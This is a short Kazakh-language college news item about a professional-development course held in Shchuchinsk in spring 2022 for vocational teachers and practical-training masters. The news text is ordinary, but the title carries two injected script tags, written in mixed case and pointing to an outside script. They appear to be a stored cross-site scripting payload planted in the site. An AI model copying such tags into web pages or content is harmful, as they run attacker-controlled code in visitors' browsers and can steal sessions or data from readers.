Оқытушыларға арналған біліктілікті арттыру курстары<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

17.05.2022 Оқытушының кәсіби дамуы оның іс-әрекетінде маңызды орын алады, өйткені ол оқытушыны оқытудың жаңа, инновациялық технологияларымен таныстырады, кәсіби құзыреттілігін арттыруға ықпал етеді. 28 наурыз бен 6 мамыр аралығында Щучинск қаласының Жоғары техникалық колледж базасында Ақмола облысы білім басқармасының оқу-әдістемелік кабинеті мен "Талап" КеАҚ ұйымдастыруымен ТжКБ ұйымының оқытушыларының біліктілігін арттыру курсы өтті. «Техникалық және кәсіптік, орта білімнен кейінгі білім беру жүйесінің педагогы: еңбек функцияларын жетілдіру» тақырыбында 20 оқытушы мен ө/о шеберлері оқытылды. Білім, білік және тәжірибелік дағдыларын жетілдіру курс бағдарламасы аясында оқытушылар қала кәсіпорындарында тағылымдама өтті. Курс нәтижесінде колледж оқытушы мен ө/о шеберлері Жас мамандар мектебінің отырысында сөз сөйлеп, жас әріптестерімен алған білімдерімен бөлісті.
Просмотров: 601


Пікір қосу



Деректерді қолтаңбаға қосу
Текст